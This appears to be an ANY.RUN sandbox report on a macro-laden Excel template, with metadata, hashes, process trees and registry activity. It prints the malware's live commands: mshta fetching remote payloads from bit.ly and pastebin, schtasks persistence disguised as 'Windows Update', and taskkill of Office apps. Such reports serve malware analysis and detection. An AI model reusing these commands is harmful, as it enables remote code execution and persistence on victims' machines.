General Info

File name

Specifications___9927265.xlt

Full analysis
https://app.any.run/tasks/8138b543-80bd-4122-a214-49c02fd0e482
Verdict
Malicious activity
Analysis date
9/11/2019, 11:39:36
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: mana zaheer, Last Saved By: mana zaheer, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Sep 10 08:54:29 2019, Last Saved Time/Date: Tue Sep 10 08:55:13 2019, Security: 0
MD5

9d41caa6de6ceb6fbeec9142496f9f89

SHA1

a1056e4279d9dc1aab97a20548628794424f5d8e

SHA256

88fa4316062f115bda55f5ee813f142f656f4c93c080e3eafc2489bcf484a72c

SSDEEP

1536:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAVLviN5y7Mersnd/rH3FCXsqQjbfhgBJ:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 2540)
  • schtasks.exe (PID: 2288)
Uses Task Scheduler to run other applications
  • mshta.exe (PID: 3924)
Changes the autorun value in the registry
  • mshta.exe (PID: 3924)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 3432)
Starts MSHTA.EXE for opening HTA or HTMLS files
  • EXCEL.EXE (PID: 3432)
Uses TASKKILL.EXE to kill process
  • cmd.exe (PID: 1008)
Uses TASKKILL.EXE to kill Office Apps
  • cmd.exe (PID: 1008)
Creates files in the user directory
  • mshta.exe (PID: 3924)
  • mshta.exe (PID: 2608)
Starts CMD.EXE for commands execution
  • mshta.exe (PID: 3924)
Application launched itself
  • mshta.exe (PID: 2608)
Starts MSHTA.EXE for opening HTA or HTMLS files
  • mshta.exe (PID: 2608)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 3432)
Reads internet explorer settings
  • mshta.exe (PID: 3924)
  • mshta.exe (PID: 2608)
Creates files in the user directory
  • EXCEL.EXE (PID: 3432)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xls
|   Microsoft Excel sheet (48%)
.xls
|   Microsoft Excel sheet (alternate) (39.2%)
EXIF
FlashPix
Author:
mana zaheer
LastModifiedBy:
mana zaheer
Software:
Microsoft Excel
CreateDate:
2019:09:10 07:54:29
ModifyDate:
2019:09:10 07:55:13
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
Sheet1
HeadingPairs
null
null
CompObjUserTypeLen:
32
CompObjUserType:
Microsoft Excel 2003 Worksheet

Screenshots

Processes

Total processes
47
Monitored processes
10
Malicious processes
3
Suspicious processes
1

Behavior graph

+
start excel.exe no specs mshta.exe mshta.exe cmd.exe no specs schtasks.exe no specs schtasks.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3432
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\mshta.exe
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll

PID
2608
CMD
mshta http://bit.ly/mylunlenahaiakslagaaki
Path
C:\Windows\system32\mshta.exe
Indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\jscript.dll
c:\program files\common files\microsoft shared\vgx\vgx.dll
c:\windows\system32\atl.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mlang.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
3924
CMD
"C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/eS9WmF3u
Path
C:\Windows\System32\mshta.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\jscript.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
1008
CMD
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2288
CMD
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "Windows Update" /tr "mshta.exe http://pastebin.com/raw/W1fzJNbg" /F
Path
C:\Windows\System32\schtasks.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
2540
CMD
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Update" /tr "mshta.exe http://pastebin.com/raw/Gt93FF9X" /F
Path
C:\Windows\System32\schtasks.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
3724
CMD
taskkill /f /im winword.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3132
CMD
taskkill /f /im excel.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3280
CMD
taskkill /f /im MSPUB.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2204
CMD
taskkill /f /im POWERPNT.EXE
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

Registry activity

Total events
761
Read events
702
Write events
54
Delete events
5

Modification events

PID
Process
Operation
Key
Name
Value
3432
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3432
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3432
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\16A118
3432
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
m&$
6D262400680D0000010000000000000000000000
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
680D00005CD0C8DC8468D50100000000
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\16A118
16A118
04000000680D00003700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00530070006500630069006600690063006100740069006F006E0073005F005F005F0039003900320037003200360035002E0078006C0074002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000B00520DE8468D50118A1160018A1160000000000AC0200000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000